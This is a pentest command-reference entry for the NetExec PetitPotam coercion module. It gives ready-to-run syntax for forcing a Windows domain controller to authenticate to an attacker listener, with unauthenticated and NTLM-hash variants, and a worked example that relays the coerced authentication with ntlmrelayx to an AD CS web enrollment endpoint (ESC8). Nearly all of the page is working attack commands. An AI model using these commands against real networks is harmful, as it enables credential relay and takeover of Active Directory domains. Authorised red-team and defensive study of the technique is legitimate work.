NetExec PetitPotam Coercion
Coerce a Windows host (typically a DC) to authenticate back to the attacker via the EFSRPC interface (PetitPotam). Pair with ntlmrelayx.py -t http://<ca>/certsrv/certfnh.asp for ESC8.
- Tool
- nxc
- Category
- Credential Attacks / NTLM Relay & Coercion
- Platform
- linux
- Requires
- password
- Protocols
- SMB, RPC
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc smb <ip> -u <user> -p <password> -M petitpotam -o LISTENER=<attacker_ip>
Credential variants
The same attack using a different authentication material.
Unauthenticated (Pre-Patch) requires no credentials
nxc smb <ip> -u '' -p '' -M petitpotam -o LISTENER=<attacker_ip>
NTLM Hash requires NTLM hash
nxc smb <ip> -u <user> -H <hash> -M petitpotam -o LISTENER=<attacker_ip>
Examples
nxc smb dc01.corp.local -u jdoe -p 'Password123!' -M petitpotam -o LISTENER=10.10.14.5
ntlmrelayx.py -t http://ca01.corp.local/certsrv/certfnh.asp --adcs --template DomainController
Tags
References
Related commands
- Coercer Coerce NTLM authentication using multiple RPC protocols
- Coercer Scan (Find Coercion Vectors) Probe a target for every known authentication-coercion RPC method (PetitPotam,…
- DFSCoerce Coerce NTLM authentication using MS-DFSNM (Distributed File System)
- NetExec coerce_plus Module Unified coercion module — replaces the individual…
- NetExec Generate Relay Target List Scan a subnet over SMB and write a file containing every host with SMB signing disabled.…
- NetExec mssql_coerce Module Coerce the MSSQL service account to authenticate to your relay listener via xp_dirtree /…
- NetExec SMB Coerce Plus Trigger NTLM authentication coercion using multiple methods (PetitPotam, PrinterBug,…
- NetExec SMB NTLMv1 Check Check if NTLMv1 authentication is accepted on remote hosts (enables downgrade attacks)